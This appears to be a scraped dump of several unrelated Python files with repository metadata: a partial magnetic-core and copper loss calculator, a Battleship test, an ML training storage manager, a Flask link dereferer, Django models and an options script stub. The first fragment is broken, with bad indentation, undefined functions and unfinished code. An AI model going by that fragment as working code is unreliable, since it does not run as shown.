l = 2*w_core + 2*l_core + 8*dc*m + 4*10e-3
# -------------waveform parameters
pv = CoreLoss(um_vec, t_vec, k, alpha, beta, n1, ae*core_np, ki)
p_core = pv*ve*core_np
    copper_loss1 = CopperLoss(il_rms, fs, d0, dc, n0, 2*n, 2*m, l)  # NOTE: CopperLoss() is not defined in this file; assumed external
rou = 1/59/6e6
mu0 = 4*math.pi*1e-7
d02 = 5e-3
dc2 = 5e-3
n02 = 1
n2 = 1
m2 = 1
l2 = 4
delta = math.sqrt(rou/math.pi/mu0/fs)
zeta = d02/delta
    p = posai(zeta, 50)  # NOTE: posai() is not defined in this file; assumed to be provided elsewhere
kd = zeta/2/math.sqrt(2)*p
rdc = l2*4*n2*rou/n02/math.pi/d02/d02
rac = kd*rdc
copper_loss2 = il_rms*il_rms*rac
ptr_cond = copper_loss1+copper_loss2
return ptr_cond, p_core
def KiCal(k, alpha, beta, step):
    # Fixed: the original passed the linspace arguments in the wrong order;
    # sample one full period [0, 2*pi) with spacing `step`.
    x = np.arange(0, 2*math.pi, step)
    y = np.abs(np.power(np.cos(x), alpha)*np.power(2, beta-alpha))
    integral = np.trapz(y, x)
    return k/np.power(2*math.pi, alpha-1)/integral
def CoreLoss(um, t, k, alpha, beta, n1, ae, ki):
    parse_step = 10
    # Resample by index (the original indexed arrays with float linspace values).
    idx = np.linspace(0, len(t) - 1, parse_step).astype(int)
    t = t[idx]
    um = um[idx]
    dt = t[1]-t[0]
    u_integ = np.zeros(np.shape(um))
    u_integ[0] = um[0]
    for i in range(1, len(um)):  # fixed: range() needs an int, not the shape tuple
        u_integ[i] = u_integ[i-1] + um[i]
    b = dt*u_integ/n1/ae
    min_b = np.min(b)
    max_b = np.max(b)
    # Central difference of B via circularly shifted copies; the original
    # np.column_stack calls were invalid (wrong signature and slicing).
    b_extend1 = np.concatenate(([b[-1]], b[:-1]))
    b_extend2 = np.concatenate((b[1:], [b[0]]))
    t_extend1 = np.concatenate(([t[0]-dt], t[:-1]))
    t_extend2 = np.concatenate((t[1:], [t[-1]+dt]))
    db = (b_extend2-b_extend1)/(t_extend2-t_extend1)
    integral = np.trapz(ki*np.abs(np.power(db,alpha)*np.power((max_b-min_b),(beta-alpha))),t)
    return integral/(t[-1]-t[0])
def wireResis(f, d0, dc, n0, n, m, l):
    rou = 1/59.6e6
    mu0 = 4*math.pi*1e-7
    b = np.power((d0/2),2)*n0/np.power((dc/2),2)
    delta = np.sqrt(rou/math.pi/mu0/f)
    # The original source ends this function here without computing or
    # returning the AC winding resistance.
def CalculateSwitchConductionLoss(il_vec, vout_vec, t_vec):
    # The original file is truncated mid-assignment here ("wpri_cond ="), so
    # the conduction-loss computation was never completed.
    raise NotImplementedError("switch conduction loss is incomplete in the original source")
|
[
"313994566@qq.com"
] |
313994566@qq.com
|
22a21b51c6ebe82370f1f7a066d1130fa27a4d10
|
35a14aea825e40b6284388827407e17b9e4fd688
|
/test/TestGame.py
|
e3ef646cfccfbc023db3a5d2bc2a2106bb0cbc29
|
[] |
no_license
|
spatzle/Practice-Battleship
|
77411a1ea950982924cfdce193ed07300ae8dd0f
|
9b062a12b3b1e958154c6089ab847d0632d6d971
|
refs/heads/master
| 2021-01-13T02:03:22.612825
| 2011-03-23T14:35:32
| 2011-03-23T14:35:32
| 1,516,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 995
|
py
|
'''
Created on 2011-03-22
@author: joyce
'''
import unittest
from Player import Player
from Point import Point
from PlayerError import FleetNotAllOnGrid
from Game import Game
class TestGame(unittest.TestCase):
def _setupPlayer(self,p,g):
m = p.mygrid
m.placeShipOnGrid(p.fleet.destroyer, Point([1,1]), Point([2,1]))
m.placeShipOnGrid(p.fleet.submarine, Point([4,1]), Point([6,1]))
m.placeShipOnGrid(p.fleet.cruiser, Point([2,3]), Point([2,5]))
m.placeShipOnGrid(p.fleet.battleship, Point([6,5]), Point([9,5]))
m.placeShipOnGrid(p.fleet.aircraftcarrier, Point([2,9]), Point([6,9]))
print(m)
try:
p.ready()
except FleetNotAllOnGrid:
'''
will try again
'''
def testGameOk(self):
g = Game()
self._setupPlayer(g.player1,g)
self._setupPlayer(g.player2,g)
g.play()
if __name__ == '__main__':
unittest.main()
|
[
"joyce.sz.chan@gmail.com"
] |
joyce.sz.chan@gmail.com
|
80ea75adc5da4fe81b94b066b777d0f2d6067b03
|
f9a8aecd848bcc79052ca068cc73850a63e6dfcf
|
/training/in_out/storage_manager.py
|
5d34501fdf93be3a637da857c22a455e520d89a5
|
[
"MIT"
] |
permissive
|
khoehlein/fV-SRN-Ensemble-Compression
|
537981a1cd31565bb504b00ca730e8bf87e7e0ef
|
2780b83d2594c1b38b57ab58087b46bee4b61e8b
|
refs/heads/master
| 2023-04-17T09:42:48.037397
| 2022-09-07T08:55:01
| 2022-09-07T08:55:01
| 532,983,107
| 4
| 1
| null | 2022-09-06T14:39:26
| 2022-09-05T16:43:24
|
Python
|
UTF-8
|
Python
| false
| false
| 7,867
|
py
|
import argparse
import io
import json
import os
import shutil
import subprocess
import sys
import h5py
import imageio
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
class StorageManager(object):
class CheckpointKey(object):
EPOCH = 'epoch'
PARAMETERS = 'parameters'
MODEL = 'model'
@staticmethod
def init_parser(parser: argparse.ArgumentParser, base_directory):
parser_group = parser.add_argument_group("Output")
prefix = '--output:'
parser.add_argument(prefix + 'base-dir', type=str, default=base_directory)
parser_group.add_argument(prefix + 'log-dir', type=str, default='results/log',
help='directory for tensorboard logs')
parser_group.add_argument(prefix + 'checkpoint-dir', type=str, default='results/model',
help='Output directory for the checkpoints')
parser_group.add_argument(prefix + 'hdf5-dir', type=str, default='results/hdf5',
help='Output directory for the hdf5 summary files')
parser_group.add_argument(prefix + 'experiment-name', type=str, default=None,
help='Output name. If not specified, use the next available index')
parser_group.add_argument(prefix + 'save-frequency', type=int, default=10,
help='Every that many epochs, a checkpoint is saved')
parser_group.add_argument('--profile', action='store_true')
def __init__(self, opt, overwrite_output=False):
self.opt = opt
self.opt.update({
key: os.path.join(opt['output:base_dir'], opt[key])
for key in ['output:log_dir', 'output:checkpoint_dir', 'output:hdf5_dir']
})
self.overwrite_output = overwrite_output
def print_output_directories(self):
print("Model directory:", self.opt['output:checkpoint_dir'])
print("Log directory:", self.opt['output:log_dir'])
print("HDF5 directory:", self.opt['output:hdf5_dir'])
def _find_next_run_number(self, folder):
if not os.path.exists(folder): return 0
files = os.listdir(folder)
files = sorted([f for f in files if f.startswith('run')])
if len(files) == 0:
return 0
return int(files[-1][3:])
def make_output_directories(self):
opt = self.opt
if opt['output:experiment_name'] is None:
nextRunNumber = max(self._find_next_run_number(opt['output:log_dir']),
self._find_next_run_number(opt['output:checkpoint_dir'])) + 1
print('Current run: %05d' % nextRunNumber)
runName = 'run%05d' % nextRunNumber
else:
runName = opt['output:experiment_name']
self.overwrite_output = True
self.log_dir = os.path.join(opt['output:log_dir'], runName)
self.checkpoint_dir = os.path.join(opt['output:checkpoint_dir'], runName)
self.hdf5_file = os.path.join(opt['output:hdf5_dir'], runName + ".hdf5")
if self.overwrite_output and (os.path.exists(self.log_dir) or os.path.exists(self.checkpoint_dir) or os.path.exists(self.hdf5_file)):
print(f"Warning: Overwriting previous run with name {runName}")
if os.path.exists(self.log_dir):
shutil.rmtree(self.log_dir)
os.makedirs(self.log_dir, exist_ok=self.overwrite_output)
os.makedirs(self.checkpoint_dir, exist_ok=self.overwrite_output)
os.makedirs(opt['output:hdf5_dir'], exist_ok=True)
def store_script_info(self):
with open(os.path.join(self.checkpoint_dir, 'args.json'), "w") as f:
json.dump(self.opt, f, indent=4, sort_keys=True)
with open(os.path.join(self.checkpoint_dir, 'cmd.txt'), "w") as f:
import shlex
f.write('cd "%s"\n' % os.getcwd())
f.write(' '.join(shlex.quote(x) for x in sys.argv) + "\n")
def opt_string(self):
return str(self.opt)
def get_tensorboard_summary(self):
self.writer = SummaryWriter(self.log_dir)
self.writer.add_text('info', self.opt_string(), 0)
return self.writer
def get_hdf5_summary(self):
hdf5_file = h5py.File(self.hdf5_file, 'w')
for k, v in self.opt.items():
try:
hdf5_file.attrs[k] = v
except TypeError as ex:
print(f'[WARN] Exception {ex} while saving attribute {k} = {v}')
try:
git_commit = subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode('ascii').strip()
hdf5_file.attrs['git'] = git_commit
print("[INFO] Git commit:", git_commit)
except:
print("[WARN] Storage manager was unable to get git commit.")
return hdf5_file
@staticmethod
def save_network(network):
weights_bytes = io.BytesIO()
torch.save(network.state_dict(), weights_bytes)
return np.void(weights_bytes.getbuffer())
def initialize_hdf5_storage(self, hdf5_file, num_epochs, num_epochs_with_save, loss_names, network):
self.times = hdf5_file.create_dataset("times", (num_epochs,), dtype=np.float32)
self.losses = dict([
(name, hdf5_file.create_dataset(name, (num_epochs,), dtype=np.float32))
for name in loss_names
])
self.epochs = hdf5_file.create_dataset("epochs", (num_epochs,), dtype=int)
self.weights = hdf5_file.create_dataset(
"weights",
(num_epochs_with_save, self.save_network(network).shape[0]),
dtype=np.dtype('V1'))
self.export_weights_counter = 0
self.export_stats_counter = 0
return self
def _check_for_attribute(self, *attrs):
for attr in attrs:
if not hasattr(self, attr):
raise AttributeError(f'[ERROR] StorageManager does not have {attr} initialized yet!')
def store_torch_checkpoint(self, epoch, network):
self._check_for_attribute('checkpoint_dir')
model_out_path = os.path.join(self.checkpoint_dir, "model_epoch_{}.pth".format(epoch if epoch >= 0 else "init"))
state = {
StorageManager.CheckpointKey.EPOCH: epoch + 1,
StorageManager.CheckpointKey.MODEL: network,
StorageManager.CheckpointKey.PARAMETERS: self.opt}
torch.save(state, model_out_path)
print("Checkpoint saved to {}".format(model_out_path))
def store_hdf5_checkpoint(self, network):
self._check_for_attribute('weights')
self.weights[self.export_weights_counter, :] = self.save_network(network)
self.export_weights_counter = self.export_weights_counter + 1
def update_training_metrics(self, epoch, losses, num_batches, lr):
self._check_for_attribute('writer')
for k, v in losses.items():
self.writer.add_scalar('train/%s' % k, v / num_batches, epoch)
self.writer.add_scalar('train/lr', lr, epoch)
def update_validation_metrics(self, epoch, losses, num_batches, run_time):
self._check_for_attribute('writer', 'times', 'losses', 'epochs')
for k, v in losses.items():
self.writer.add_scalar('val/%s' % k, v / num_batches, epoch)
self.times[self.export_stats_counter] = run_time
for k, v in losses.items():
self.losses[k][self.export_stats_counter] = v / num_batches
self.epochs[self.export_stats_counter] = epoch
self.export_stats_counter += 1
def store_image(self, epoch, image):
self._check_for_attribute('writer')
img_np = np.array(image)
imageio.imwrite(os.path.join(self.log_dir, ("e%d.png" % epoch) if epoch >= 0 else "eInit.png"), img_np)
self.writer.add_image('vis', np.moveaxis(img_np, (0, 1, 2), (1, 2, 0)), epoch)
|
[
"kevin.hoehlein@tum.de"
] |
kevin.hoehlein@tum.de
|
fdadcbf64f422cf13ee2fb4e35986b9fa8f0d439
|
d8c32144001fc77c23aee731d6ce768fac72ed3d
|
/builder.py
|
6805711e0b173147c02dc6cd876963810ff23a1b
|
[] |
no_license
|
Shubham617/Text-Suggestions-Auto-Complete
|
21ddc704b83ca3def32a130d695312f5824c6839
|
81fb03c2986175a50dae98e4bef294e09b262728
|
refs/heads/master
| 2021-06-20T16:02:52.800920
| 2017-07-30T19:10:44
| 2017-07-30T19:10:44
| 98,810,946
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,008
|
py
|
import suffix
import prefix
from functools import *
NONWORD = '\n'
def build(name):
return build_chain(add_to_chain, pairs_gen(name, line_gen), suffix.empty_suffix())
def build_chain(fxn, gen_obj, imm_obj):
return reduce(fxn, gen_obj, imm_obj)
def add_to_chain(chain, pair):
if (chain.get(pair[0])) == None:
#sfx = suffix.empty_suffix()
return chain.put(pair[0], suffix.add_word(suffix.empty_suffix(), pair[1]))
#sfx.put(pair[1], 1))
return chain.put(pair[0], suffix.add_word(chain.get(pair[0]), pair[1]))
def line_gen(name):
with open(name) as in_file:
data = in_file.readlines()
for line in data:
yield line
def pairs_gen(name, gen_fxn):
gen = gen_fxn(name)
start = prefix.new_prefix(NONWORD, NONWORD)
for line in gen:
lst = list(line.split())
for i in lst:
copy = start
start = prefix.shift_in(start,i)
yield ((copy),i)
yield ((start), NONWORD)
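# Minimal usage sketch (added; assumes a plain-text corpus file named
# 'corpus.txt' and the local prefix/suffix modules on the import path):
# chain = build('corpus.txt')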
|
[
"smlakers@gmail.com"
] |
smlakers@gmail.com
|
91a24e930254656db82201045c6bbcefad002019
|
5410c449f2e869aeb795c044c16984d2f4c7241f
|
/dereferer/app.py
|
75ac600a0598d68b08452a54619bd1200be83882
|
[] |
no_license
|
jcsaaddupuy/dereferer
|
7505085f65bc9abd1524d7471d9ed4c3ba9f40ed
|
edda3740a5a9b3431b86ecd0b08577a46010693f
|
refs/heads/master
| 2016-09-05T20:12:34.441938
| 2015-08-26T20:10:12
| 2015-08-26T20:10:12
| 41,445,432
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,669
|
py
|
from __future__ import unicode_literals
import logging
import logging.config
import os
from flask import Flask
from flask import request
try:
from urllib.parse import urlparse, unquote, parse_qsl, urlencode
except:
from urlparse import urlparse, parse_qsl
from urllib import unquote, urlencode
import requests
class ReverseProxied(object):
'''Wrap the application in this middleware and configure the
front-end server to add these headers, to let you quietly bind
this to a URL other than / and to an HTTP scheme that is
different than what is used locally.
In nginx:
location /myprefix {
proxy_pass http://192.168.0.1:5001;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Scheme $scheme;
proxy_set_header X-Script-Name /myprefix;
}
:param app: the WSGI application
snippet from http://flask.pocoo.org/snippets/35/
'''
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
script_name = environ.get('HTTP_X_SCRIPT_NAME', '')
if script_name:
environ['SCRIPT_NAME'] = script_name
path_info = environ['PATH_INFO']
if path_info.startswith(script_name):
environ['PATH_INFO'] = path_info[len(script_name):]
scheme = environ.get('HTTP_X_SCHEME', '')
if scheme:
environ['wsgi.url_scheme'] = scheme
return self.app(environ, start_response)
app = Flask(__name__)
app.wsgi_app = ReverseProxied(app.wsgi_app)
logging_conf = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logging.conf')
logging.config.fileConfig(logging_conf)
index_tpl = """
<html>
<head>
<title>dereferer</title>
</head>
<body>
<h1>What is it?</h1>
<p>This application let you remove http referer for links you visit.</p>
<h1>How?</h1>
<p>Simply use '{host_url}?' or '{host_url}?u=' in front of your url.</p>
<p>Example : <a href='{host_url}?http://www.whatismyreferer.com/'>{host_url}?http://www.whatismyreferer.com/</a></p>
<h1>Test it</h1>
<p>
<form action='{host_url}?'>
<label for='u'>Enter an url : <label/>
<input name='u' type='text' size='31' value='http://www.whatismyreferer.com'/>
<input type='submit' value='Go'/>
</form>
</p>
</body>
</html>
"""
redirect_tpl = """
<html>
<head>
<title>redirecting...</title>
<meta http-equiv="refresh" content="0; URL={url}" />
</head>
<body>
<p>you are being redirected to<br />
<a id="autoclick" rel="noreferrer" href="{url}">{url}</a></p>
</body>
<script language="JavaScript" type="text/javascript">
window.setTimeout(function () {{ document.getElementById('autoclick').click(); }}, 1000 * 0.5);
</script>
</html>
"""
KNOWN_SHORTNERZ = (
'goo.gl',
'bit.ly',
't.co',
    'ow.ly',  # fixed typo: the original listed 'ow.li'
'tr.im',
'is.gd',
'tiny.cc',
'tinyurl.com',
'bit.do',
'fb.me',
)
def _follow(url):
""" Follows 301 and 302 redirect and extract location for url matches known
shortners """
try:
urlp = urlparse(url)
except Exception:
app.logger.exception("Could not parse %s", url)
else:
if urlp.netloc not in ('localhost', '127.0.0.1', request.host)\
and urlp.netloc in KNOWN_SHORTNERZ\
and urlp.scheme:
try:
app.logger.info("Following %s", url)
resp = requests.head(url, allow_redirects=False, timeout=1)
if resp.ok and resp.status_code in (301, 302):
url = resp.headers.get('Location')
if not url:
# could not get location with 'L', try lowercase
# and fallback to original url
url = resp.headers.get('location', url)
app.logger.info("URL is a redirection. Next url %s", url)
except Exception:
app.logger.exception("Could not get head at url %s", url)
return url
ANNOYING_PARAMS = (
'utm_',
'action_object_map', 'action_ref_map', 'action_type_map', 'fb_',
'__scoop',
'xtor',
)
def cleanup(url):
url = _follow(url)
# remove trackers params
try:
urlp = urlparse(url)
# cleanup query param
query = parse_qsl(urlp.query)
# only if query is non empty and we manage to parse fragment as
# key/value
if urlp.query and query:
for annoying in ANNOYING_PARAMS:
query = [(x, y) for x, y in query if not x.startswith(annoying)]
urlp = urlp._replace(
query=urlencode(query),
)
# cleanup fragment param
fragment = parse_qsl(urlp.fragment)
# only if fragments is non empty and we manage to parse fragment as
# key/value
if urlp.fragment and fragment:
for annoying in ANNOYING_PARAMS:
fragment = [(x, y) for x, y in fragment if not x.startswith(annoying)]
urlp = urlp._replace(
fragment=urlencode(fragment),
)
url = urlp.geturl()
except Exception:
app.logger.exception("Problem cleaning url %s", url)
app.logger.info("Final url %s", url)
return url
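# Illustrative example (added): query parameters whose keys match an
# ANNOYING_PARAMS prefix are stripped, e.g.
# cleanup('http://example.com/a?utm_source=feed&id=42') -> 'http://example.com/a?id=42'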
@app.route("/", methods=['GET', ])
def index():
if len(request.args):
url = unquote(
request.args.get('u', request.url.split('?')[-1])
)
return redirect_tpl.format(url=cleanup(url))
return index_tpl.format(host_url=request.url)
app.logger.info("Up and running")
if __name__ == "__main__":
app.run(debug=True)
|
[
"jc.saaddupuy@fsfe.org"
] |
jc.saaddupuy@fsfe.org
|
3ac04967e2384947a97b1002bf6624d0e7228ae1
|
8a10ecca2519bdf18209eaa6d581fc05d82068c6
|
/pmoApp/context_processors.py
|
0b0948d9a4c7320feae190e1e18912d64e3662a3
|
[] |
no_license
|
juthebest/pmoNesims
|
1cca36c705f47d1a8b78eb23a00c67ce14cb8f17
|
2ed6bac546b37cb6afb8faee695fecb25b90b721
|
refs/heads/master
| 2020-12-04T10:13:37.142611
| 2018-04-05T08:13:20
| 2018-04-05T08:13:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
from .models import *
from django.shortcuts import render
def crisis(request):
return{
'showCrisisList': list(CMOPlanReport.objects.all())
}
def status(request):
querylist1 = []
caseIds = CMOPlanReport.objects.values_list('caseID')
for i in range(len(caseIds)):
qs1=statusReport.objects.filter(caseID_id=caseIds[i]).last()
if qs1:
querylist1.append(qs1)
return{
'filterStatus': querylist1
}
|
[
"nurhayatichua@gmail.com"
] |
nurhayatichua@gmail.com
|
e7ffe724681f4837b1cb1f95ec038554a19de877
|
34c7b11feaa350873d1428212c268b8111617759
|
/trainer/sub_trainer/train_only_cnn.py
|
051293ef8967a06c362d89e700b62ac0c33853ca
|
[] |
no_license
|
Ryu0w0/ConvAutoencoder
|
ea9b34bb644f8ebed1358e9ff0c8b7090fbf1892
|
879d71aec3c1ce4723110ddab105db5cf24180fe
|
refs/heads/master
| 2023-01-20T09:29:51.101520
| 2020-11-15T07:49:11
| 2020-11-15T07:49:11
| 308,183,519
| 1
| 0
| null | 2020-11-15T07:49:13
| 2020-10-29T01:21:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,686
|
py
|
import numpy as np
import torch
import torch.nn.functional as F
from utils.global_var import TrainType
from utils import global_var as glb
from utils.seed import seed_everything
from utils.early_stop import EarlyStopping
from torch.utils.data.dataloader import DataLoader
from trainer.abstrainer import AbsTrainer
from trainer.stat_collector import StatCollector
class TrainOnlyCNN(AbsTrainer):
"""
Training CNN for a single epoch.
"""
def __init__(self, cv_dataset, args, config, device):
super().__init__(cv_dataset, args, config, device)
self.stat_collector = StatCollector(self.cv_dataset.classes, args)
@staticmethod
def _get_early_stopping():
return EarlyStopping(min_delta=0.0001, improve_range=10, score_type="acc")
def _train_epoch(self, cur_fold, cur_epoch, num_folds, model, optimizer,
dataset, mode: TrainType, es=None):
"""
Train CNN for a single epoch.
model: instance of CNN
dataset: instance of sub-class of AbstractCIFAR10
mode: glb.cv_train or glb.cv_valid
es: instance of EarlyStopping
"""
seed_everything()
loader = DataLoader(dataset, batch_size=self.args.batch_size, shuffle=True)
total_loss = 0
preds = []
gt_labels = []
if mode == TrainType.CV_TRAIN:
model.train()
else:
model.eval()
# training iteration
        for batch_idx, batch in enumerate(loader):  # renamed from `id` to avoid shadowing the built-in
images, labels = batch
images, labels = images.to(self.device), labels.long().to(self.device)
output = model(images) # shape: (data_num, class_num)
output = F.log_softmax(output, dim=1)
loss = F.nll_loss(output, labels)
if mode == TrainType.CV_TRAIN:
optimizer.zero_grad()
loss.backward()
optimizer.step()
# collect statistics
total_loss += loss.detach().cpu().item()
_, predicted = torch.max(output.detach().cpu(), 1)
preds.extend(predicted.tolist())
gt_labels.extend(labels.detach().cpu().tolist())
if mode == TrainType.CV_VALID:
# logging statistics
mean_loss, stats = self.stat_collector.calc_stat_cnn(total_loss, np.array(preds), np.array(gt_labels))
self.stat_collector.logging_stat_cnn(mode=mode.value, cur_fold=cur_fold, cur_epoch=cur_epoch,
mean_loss=mean_loss, stats=stats, num_folds=self.num_folds)
# record score for early stopping
es.set_stop_flg(mean_loss, stats["accuracy"])
|
[
"flymetothemoon0w0@gmail.com"
] |
flymetothemoon0w0@gmail.com
|
cc2478d9ebb6271fb58d0503a00d18aa97ffb37c
|
17ecb7acac9b647d694c397db33d58f2899137ee
|
/kivy/aulas/Seção 19 - Orientação a Objeto II/Decorators.py
|
1596bfc0c75c937b3b5aac70bcbb6a2dcd759609
|
[] |
no_license
|
PedroRamos360/PythonCourseUdemy
|
c7f3af1c6bf4aaab9296794ebab517c3a57b9b87
|
b834918017c8ed6b3b306644cd122bf3ebb770ef
|
refs/heads/master
| 2020-12-27T10:00:44.830784
| 2020-10-06T22:12:04
| 2020-10-06T22:12:04
| 237,859,157
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
class A:
    def __init__(self):  # fixed: the original `__int__` typo meant the constructor never ran
self._var = 0
@property
def var(self):
return self._var
@var.setter
def var(self, x):
self._var = x
a = A()
a.var = 10
t = a.var
print(t)
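# Added note: the @var.setter stores 10 in `a._var`, the @property getter
# reads it back, so this prints 10.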
|
[
"53490820+PedroRamos360@users.noreply.github.com"
] |
53490820+PedroRamos360@users.noreply.github.com
|
a0b57ef38ca9b18ba125d1c6f7bc15324c4b36c6
|
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
|
/ml-flask/Lib/site-packages/caffe2/python/mkl/mkl_sbn_speed_test.py
|
181f58e1350d04d4f2a1ee6bfd89f06fe947516a
|
[
"MIT"
] |
permissive
|
YaminiHP/SimilitudeApp
|
8cbde52caec3c19d5fa73508fc005f38f79b8418
|
005c59894d8788c97be16ec420c0a43aaec99b80
|
refs/heads/master
| 2023-06-27T00:03:00.404080
| 2021-07-25T17:51:27
| 2021-07-25T17:51:27
| 389,390,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:d7ccfc28b48531f34b0173911a02184968225b607033f39386215d31af9bbe20
size 4605
|
[
"yamprakash130@gmail.com"
] |
yamprakash130@gmail.com
|
9f1b20c80154b75ac89fc586ccd025df92557063
|
91b72a74fdb575ac3070e3cdecca939cf6d9fe23
|
/damhwa_server/django_server/django_server/kobertmodel/models.py
|
c3a1d7075fd9e823ce9f065f4aa8346e0609dfac
|
[] |
no_license
|
minkpang/Damwha
|
5dce00481ea5a017944f223e6099d41a157e24c8
|
b2e070c93fd2c6e7959bb7f2c7cd36fe5b998693
|
refs/heads/master
| 2023-08-17T20:31:00.341261
| 2021-10-07T15:59:21
| 2021-10-07T15:59:21
| 416,627,247
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,758
|
py
|
from django.db import models
class Flower(models.Model):
fno = models.BigIntegerField(primary_key=True)
fnamekr = models.CharField(db_column='fnameKR', max_length=40, blank=True, null=True) # Field name made lowercase.
fnameen = models.CharField(db_column='fnameEN', max_length=40, blank=True, null=True) # Field name made lowercase.
fmonth = models.IntegerField(blank=True, null=True)
fday = models.IntegerField(blank=True, null=True)
flang = models.CharField(max_length=100, blank=True, null=True)
fcontents = models.CharField(max_length=500, blank=True, null=True)
fuse = models.CharField(max_length=500, blank=True, null=True)
fgrow = models.CharField(max_length=500, blank=True, null=True)
img1 = models.CharField(max_length=400, blank=True, null=True)
img2 = models.CharField(max_length=400, blank=True, null=True)
img3 = models.CharField(max_length=400, blank=True, null=True)
watercolor_img = models.CharField(max_length=400, blank=True, null=True)
class Meta:
managed = False
db_table = 'flower'
class History(models.Model):
hno = models.BigIntegerField(primary_key=True)
userno = models.ForeignKey('User', models.DO_NOTHING, db_column='userno', blank=True, null=True)
fno = models.ForeignKey(Flower, models.DO_NOTHING, db_column='fno', blank=True, null=True)
htype = models.IntegerField(blank=True, null=True)
contents = models.CharField(max_length=500, blank=True, null=True)
to = models.CharField(max_length=100, blank=True, null=True)
regdate = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'history'
class User(models.Model):
userno = models.BigIntegerField(primary_key=True)
email = models.CharField(max_length=50)
username = models.CharField(max_length=30, blank=True, null=True)
profile = models.CharField(max_length=400, blank=True, null=True)
token = models.CharField(max_length=500, blank=True, null=True)
class Meta:
managed = False
db_table = 'user'
class Emotion(models.Model):
fno = models.BigIntegerField(primary_key=True)
happy = models.FloatField(db_column='Happy', blank=True, null=True) # Field name made lowercase.
unstable = models.FloatField(db_column='Unstable', blank=True, null=True) # Field name made lowercase.
embarrass = models.FloatField(blank=True, null=True)
sad = models.FloatField(blank=True, null=True)
angry = models.FloatField(blank=True, null=True)
hurt = models.FloatField(blank=True, null=True)
emotion = models.TextField(db_column='Emotion', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'emotion'
|
[
"rlawjddbs963@naver.com"
] |
rlawjddbs963@naver.com
|
c2ad6cae3eb2872835f29d5b9bb302dc9eab7878
|
257c34e5dc6bde685659950c755335afee6c028f
|
/blog/utils/api_clients/backend/exceptions.py
|
d44d2562d4cbe0843fdd3938c1eb330a99d19417
|
[] |
no_license
|
smtkey/probegin
|
6cadc4e88389670d7bce457c6fda01b82d965738
|
f6f2598237fabfd3ffbc7726dc1c600072e0f107
|
refs/heads/master
| 2021-01-15T20:28:54.458390
| 2017-08-14T08:08:34
| 2017-08-14T08:08:34
| 99,852,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
api_exception_register = dict()
class APIClientErrorRegistry(type):
"""
Registers error codes and class signatures into a global exception register
which is able to map error codes to a specific exception.
"""
def __new__(cls, name, bases, attrs):
"""
Put the error code and class signature into the register when the class
is defined.
"""
exception_class = super(APIClientErrorRegistry, cls).__new__(cls, name, bases, attrs)
# Register the error code with this class signature
if exception_class.code is not None:
api_exception_register[exception_class.code] = exception_class
return exception_class
class APIClientError(Exception):
"""
An all purpose exception which is used when something went wrong with the
API client, either during the request or during the response.
"""
    # Python 2 metaclass syntax; under Python 3 this attribute is ignored and the
    # class must be declared as `class APIClientError(Exception, metaclass=APIClientErrorRegistry)`.
    __metaclass__ = APIClientErrorRegistry
code = 'internal_error'
class PostUnknownAPIClientError(APIClientError):
code = 'post_unknown'
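# Illustrative lookup (added): once the metaclass has run (under Python 2
# semantics), the registry maps error codes to exception classes:
# exc_class = api_exception_register.get('post_unknown', APIClientError)
# raise exc_class('backend returned post_unknown')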
|
[
"wonderer000@google.com"
] |
wonderer000@google.com
|
8f9754d9000261cf1c7f19388864972753850d1f
|
fd9bdf53fcef992734b937cb2d0f9d58bd9d9ead
|
/scripts/test_options.py
|
90528db7967e3554f5fecb0edadc510c65c888c0
|
[] |
no_license
|
babakopti/opti-trade
|
ec62f9b387b99838e3a9012b27e23d9da869072e
|
a01bfaa7c9792cb816cd3bb4f3a50fe3ba580a10
|
refs/heads/master
| 2023-08-19T10:56:57.207717
| 2023-08-13T02:16:33
| 2023-08-13T02:16:33
| 201,105,006
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,634
|
py
|
# ***********************************************************************
# Import libraries
# ***********************************************************************
import sys
import os
import dill
import datetime
import time
import numpy as np
import pandas as pd
sys.path.append( os.path.abspath( '../' ) )
import utl.utils as utl
from prt.prt import MfdOptionsPrt
# ***********************************************************************
# Input parameters
# ***********************************************************************
modFile = 'models/model_long_term_snap_2020_01_31.dill'
curDate = '2020-02-11'
maxDate = '2020-05-30'
indices = [ 'INDU', 'NDX', 'SPX', 'RUT', 'OEX',
'MID', 'SOX', 'RUI', 'RUA', 'TRAN',
'HGX', 'TYX', 'XAU' ]
futures = [ 'ES', 'NQ', 'US', 'YM', 'RTY', 'EMD', 'QM' ]
ETFs = [ 'QQQ', 'SPY', 'DIA', 'MDY', 'IWM', 'OIH',
'SMH', 'XLE', 'XLF', 'XLU', 'EWJ' ]
cash = 20000
# ***********************************************************************
# Get asset prices
# ***********************************************************************
if False:
